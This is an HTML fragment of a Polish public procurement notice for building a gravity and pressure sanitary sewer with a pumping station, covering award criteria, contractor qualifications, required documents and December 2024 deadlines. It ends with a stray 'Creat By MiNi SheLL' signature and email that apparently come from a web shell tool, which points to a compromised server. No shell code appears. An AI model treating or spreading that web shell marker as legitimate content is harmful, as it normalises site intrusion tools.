class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> - Budowa sieci kanalizacji sanitarnej grawitacyjnej o długości 430 oraz ciśnieniowej o długości 270 m wraz z pompownią ścieków </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-05-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Postanowienia dot. kryterium cena: Punkty w tym kryterium zostaną przyznane według wzoru: C = (Cmin/C o) x 60 pkt<br/>gdzie: C min- najniższa cena brutto z ocenianych ofert (zł)<br/>C o - cena brutto określona w ocenianej ofercie (zł)<br/>Postanowienia dot. kryterium gwarancja: Liczba punktów w kryterium gwarancja jakości zostanie przyznany w oparciu o<br/>zadeklarowany przez Wykonawcę okres gwarancji. Wykonawca może zadeklarować okres gwarancji w następującym przedziale 36-<br/>60 miesięcy.<br/>Wykonawca udzieli minimum 36 miesięcy gwarancji, maksymalnie 60 miesięcy gwarancji licząc od daty dokonania odbioru<br/>końcowego przedmiotu zamówienia przez Zamawiającego. Jeżeli Wykonawca zaoferuje okres gwarancji dłuższy niż 72 miesięcy,<br/>Zamawiający do oceny ofert przyjmie okres 72 miesięcy, a w przypadku wyboru oferty Wykonawcy, do umowy zostanie przyjęty<br/>okres gwarancji zgodnie ze złożoną ofertą.<br/>W przypadku, gdy Wykonawca nie poda (nie wpisze) w formularzu oferty okresu gwarancji, Zamawiający przyjmie do oceny<br/>minimalny (wymagany) 36 miesięczny okres gwarancji, a w przypadku wyboru oferty Wykonawcy okres ten zostanie uwzględniony w<br/>umowie.<br/>W kryterium gwarancja ocenie poddany zostanie okres gwarancji na roboty budowlane zaoferowane przez Wykonawcę na<br/>formularzu ofertowym a Zamawiający przyzna punkty w następujący sposób:<br/>Wykonawca, który zaoferuje termin gwarancji w wysokości co najmniej 36 miesięcy otrzyma 0 pkt.<br/>Wykonawca, który zaoferuje termin gwarancji w wysokości co najmniej 48 miesięcy otrzyma 20 pkt.<br/>Wykonawca, który zaoferuje termin gwarancji w wysokości co najmniej 60 miesięcy otrzyma 40 pkt.<br/>Łączną liczba punktów zostanie obliczona według następującego wzoru:<br/>P = C + G</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunki udziału w postępowaniu dotyczą: <br/>1)	zdolności do występowania w obrocie gospodarczym: Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej: Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>3)	sytuacji ekonomicznej lub finansowej:<br/>Wymagane jest posiadanie przez Wykonawcę zdolności finansowej lub środków finansowych na kwotę nie mniejszą niż 1 000 000,00 zł.<br/><br/>4)	zdolności technicznej lub zawodowej:<br/>a)	Wykonawca spełni warunek, jeżeli wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej jedno zadanie inwestycyjne w zakresie budowy, przebudowy lub rozbudowy instalacji na stacji uzdatniania wody, sieci wodociągowej, sieci kanalizacji sanitarnej .<br/>b)	Wykonawca spełni warunek, jeżeli wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej jedno zadanie projektowe w zakresie budowy, przebudowy lub rozbudowy stacji uzdatniania wody oraz odrębnie lub łącznie sieci wodociągowej lub sieci kanalizacyjnej.<br/>Wykonawca musi być w stanie wykazać i udowodnić zrealizowanie wskazanych w warunku robót na wezwanie Zamawiającego.<br/>c)	Kwalifikacje zawodowe i doświadczenie osób skierowanych do realizacji zamówienia, odpowiednie do funkcji jaka zostanie im powierzona.<br/>Za spełnienie w/w warunku dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający uzna dysponowanie:<br/>−	co najmniej 1 osobą z uprawnieniami budowlanymi do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjnej lub instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych lub odpowiadającymi im uprawnieniami budowlanymi wydanymi na podstawie wcześniej obowiązujących przepisów, która wykonała na stanowisku kierownika budowy lub kierownika robót min. jedno zadania inwestycyjne – budowy, przebudowy lub rozbudowy stacji uzdatniania wody i/lub budowy przebudowy, rozbudowy sieci wodociągowej i kanalizacji sanitarnej,<br/>−	co najmniej 1 osobą z uprawnieniami budowlanymi do projektowania bez ograniczeń w specjalności konstrukcyjnej, lub instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych lub odpowiadającymi im uprawnieniami budowlanymi wydanymi na podstawie wcześniej obowiązujących przepisów, która wykonała na stanowisku projektanta min. jedno zadanie inwestycyjne – budowy, przebudowy lub rozbudowy suw oraz budowy, przebudowy lub rozbudowy sieci wodociągowej lub kanalizacyjnej, <br/>Wykonawca przedstawi wykaz osób na wezwanie Zamawiającego. <br/><br/>Zamawiający uzna uprawnienia budowlane wydane na podstawie wcześniej i obecnie obowiązujących przepisów oraz uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo budowlane oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. 2016 poz. 65 z późn. zm.) jeżeli będą potwierdzać wymagany zakres. Wykonawca składający ofertę zobowiązuje się w przypadku podpisania umowy, do skierowania do pracy osób wskazanych w wykazie. W przypadkach losowych wykluczających zatrudnienie osób wskazanych w wykazie, Wykonawca będzie zobowiązany do zatrudnienia osób o kwalifikacjach zawodowych i wykształceniu niezbędnym do wykonania zamówienia zgodnym z wymaganiami SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)<br/>wykaz robót budowlanych odpowiadających opisowi warunku określonemu w Rozdziale VI ust. 2 pkt 4 litera a i b wykonanych nie<br/>wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w<br/>tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały<br/>wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały<br/>wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie<br/>dokumenty. Wzór wykazu stanowi załącznik nr 6 do SWZ;<br/>2) wykaz usług projektowych odpowiadających opisowi warunku określonemu w Rozdziale VI ust. 2 pkt 4 litera c wykonanych w<br/>okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,<br/>wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem<br/>dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne<br/>dokumenty wystawione przez podmiot, na rzecz którego usługi zostały wykonywane, a jeżeli wykonawca z przyczyn niezależnych od<br/>niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy. Wzór wykazu stanowi załącznik nr 7 do SWZ;<br/>3) wykaz osób, odpowiadających opisowi warunku określonemu w Rozdziale VI ust. 2 pkt 4 litera d skierowanych przez wykonawcę<br/>do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie<br/>robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o<br/>podstawie do dysponowania tymi osobami. Wzór wykazu stanowi załącznik nr 8 do SWZ;<br/>4) informację banku lub kasy oszczędnościowo-kredytowej potwierdzającą wysokość<br/>posiadanych środków finansowych lub zdolność kredytową Wykonawcy, w okresie<br/>nie wcześniejszym niż 3 miesiąc przed jej złożeniem<br/>5. W celu wykazania braku podstaw wykluczenia z postępowania o udzielenie zamówienia na podstawie okoliczności, o których<br/>mowa w Rozdziale V ust 1 pkt 2) SWZ należy złożyć na wezwanie zamawiającego, w wyznaczonym przez Zamawiającego terminie<br/>następujące podmiotowe środki dowodowe:<br/>1) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej,<br/>sporządzonej nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,<br/>2) oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw<br/>wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w art. 109 ust. 1 pkt 5 i 7.<br/>Uwaga! Zgodnie z art. 127 ust. 1 i 2 ustawy Pzp — Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli:<br/>a) może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu<br/>ustawy z dnia 17 lutego 2005 r, o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile Wykonawca wskazał<br/>w ofercie dane umożliwiające dostęp do tych środków;<br/>b) podmiotowym środkiem dowodowym jest oświadczenie. którego treść odpowiada zakresowi oświadczenia. o którym mowa w art.<br/>125 ust. 1 Pzp. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które Zamawiający posiada,<br/>jeżeli Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę.<br/>2) Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu oraz o nie podleganiu wykluczeniu -<br/>wypełnione i podpisane przez wykonawcę. Oświadczenie to stanowi dowód potwierdzający brak podstaw wykluczenia,<br/>spełnianie warunków udziału w postępowaniu odpowiednio na dzień składania ofert, tymczasowo zastępujący wymagane<br/>przez zamawiającego podmiotowe środki dowodowe.<br/>3) Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia,<br/>wraz z własnym oświadczeniem, o którym mowa w pkt 2, także oświadczenie podmiotu udostępniającego zasoby,<br/>potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu w<br/>zakresie, w jakim wykonawca powołuje się na jego zasoby. 4) W przypadku wspólnego ubiegania się o zamówienie przez<br/>wykonawców, oświadczenie, o którym mowa w pkt 2 składa każdy z wykonawców w zakresie, w jakim każdy z wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu.<br/>5) W przypadku wspólnego ubiegania się o zamówienie przez wykonawców w przypadku o którym mowa w art. 117 ust. 2 i<br/>3 ustawy Pzp, Wykonawcy składają oświadczenie, z którego wynika, które roboty budowlane , dostawy lub usługi wykonują<br/>poszczególni wykonawcy.<br/>6) ZOBOWIĄZANIE do oddania do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia jeżeli Wykonawca w<br/>celu potwierdzenia spełniania warunków udziału w postępowaniu polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby.<br/>7) Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia –<br/>dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę.<br/>2) Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu oraz o nie podleganiu wykluczeniu -<br/>wypełnione i podpisane przez wykonawcę. Oświadczenie to stanowi dowód potwierdzający brak podstaw wykluczenia,<br/>spełnianie warunków udziału w postępowaniu odpowiednio na dzień składania ofert, tymczasowo zastępujący wymagane<br/>przez zamawiającego podmiotowe środki dowodowe.<br/>3) Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia,<br/>wraz z własnym oświadczeniem, o którym mowa w pkt 2, także oświadczenie podmiotu udostępniającego zasoby,<br/>potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu w<br/>zakresie, w jakim wykonawca powołuje się na jego zasoby. 4) W przypadku wspólnego ubiegania się o zamówienie przez<br/>wykonawców, oświadczenie, o którym mowa w pkt 2 składa każdy z wykonawców w zakresie, w jakim każdy z wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu.<br/>5) W przypadku wspólnego ubiegania się o zamówienie przez wykonawców w przypadku o którym mowa w art. 117 ust. 2 i<br/>3 ustawy Pzp, Wykonawcy składają oświadczenie, z którego wynika, które roboty budowlane , dostawy lub usługi wykonują<br/>poszczególni wykonawcy.<br/>6) ZOBOWIĄZANIE do oddania do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia jeżeli Wykonawca w<br/>celu potwierdzenia spełniania warunków udziału w postępowaniu polega na zdolnościach lub sytuacji podmiotów<br/>udostępniających zasoby.<br/>7) Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik /<br/>doreprezentowaniawpostępowaniuWykonawcówwspólnieubiegającychsięoudzieleniezamówienia –<br/>dotyczyofertskładanychprzezWykonawcówwspólnieubiegającychsięoudzieleniezamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> termin wykonania zamówienia może ulec zmianie wydłużeniu po wprowadzeniu zmian ustawowych <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-27 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem platformy ezamówienia.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-27 09:20</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com